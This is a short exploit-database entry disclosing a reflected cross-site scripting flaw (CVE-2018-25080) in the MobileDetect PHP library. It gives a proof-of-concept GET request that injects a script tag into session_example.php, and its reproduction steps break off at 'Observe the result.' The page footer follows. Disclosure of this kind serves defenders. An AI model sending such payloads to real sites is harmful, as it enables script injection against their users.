# Exploit Title: MobileDetect 2.8.31 - Cross-Site Scripting (XSS) # Date: 2025-11-25 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/serbanghita/Mobile-Detect/ # Software Link: https://github.com/serbanghita/Mobile-Detect/ # Version: 4da80e5 # Tested on: Windows # CVE : CVE-2018-25080 Proof Of Concept: GET http://mobiledetect/examples/session_example.php/%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E Steps to Reproduce 1. Login as an admin user. 2. Send the request. 3. Observe the result:
Credits and Partners
All rights reserved nPulse.net 2009 - 2025
Powered by: MVCP2 / BVCP / ASPF-MILTER / PHP 8.3 / NGINX / FreeBSD
